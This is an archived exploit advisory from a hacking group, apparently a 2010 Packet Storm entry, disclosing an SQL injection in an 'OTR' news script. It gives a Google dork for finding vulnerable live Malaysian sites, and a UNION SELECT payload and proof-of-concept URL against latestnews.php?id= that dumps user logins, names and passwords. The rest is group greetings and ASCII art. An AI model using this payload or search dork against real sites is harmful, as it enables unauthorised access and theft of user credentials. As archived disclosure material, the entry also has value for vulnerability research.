OTR SQL Injection

2010-06-08T00:00:00
ID PACKETSTORM:90368
Type packetstorm
Reporter v4lc0m87
Modified 2010-06-08T00:00:00

Description

                                        
                                            `*************************************************************************   
| ,---. , . |---. ,---. ,---. ,---. ,---. ,---. , . ,  
| --- | | | | | |---' | | | |---' | | |  
| `---' `---| `---' `---' ` `---' ` `---' `---`---  
` `---'   
*************************************************************************  
[V] OTR SQL Injection Vulnerability  
  
--==[ Author ]==--  
  
[+] Author : v4lc0m87  
[+] Contact : valcom87[at]gmail[dot]com  
[+] Group : INDONESIAN CYBER  
[+] Site : http://indonesian-cyber.org/  
[+] Date : June, 7-2010 [INDONESIA]  
  
*************************************************************************  
--==[ Details ]==--  
  
[+] Vulnerable : SQL Injection  
[+] Google Dork : inurl:latestnews.php?id= ontheroad site:com.my  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
[-] Exploit :  
[+] -666/**/union/**/select/**/6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,concat_ws(USR_LOGIN,0x3a,USR_NAME,0x3a,USR_PASSWORD)/**/from/**/user+v4lc0m87--  
  
[-] Remote SQLi p0c :  
[+] http://127.0.0.1/latestnews.php?id=-666/**/union/**/select/**/6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,concat_ws(USR_LOGIN,0x3a,USR_NAME,0x3a,USR_PASSWORD)/**/from/**/user+v4lc0m87--  
  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
INDONESIAN-CYBER.ORG  
  
[V] Greetz :  
SaruKusai, MarilynMesum  
Team m0n0n banci kamera(clase_1214n,c4uR,astroboyyy,aldy182,vhesckot_1601)  
Bocah tua nakal (mbah l4mpor,awchoy)  
flyff666 cruz3N petimati spykit v3n0m uzanc  
kokoh wisdom, blue screen, skutengboy (kalian pasangan yg serasi juga loh, jikakakakakk)  
[K]urabu[S]aru [RnR] cO2 community  
and y0u !!  
  
[V] BIG THANKZ :  
DEVILZC0DE.ORG | INDONESIANHACKER.ORG | HACKER-CISADANE.ORG | IDC  
`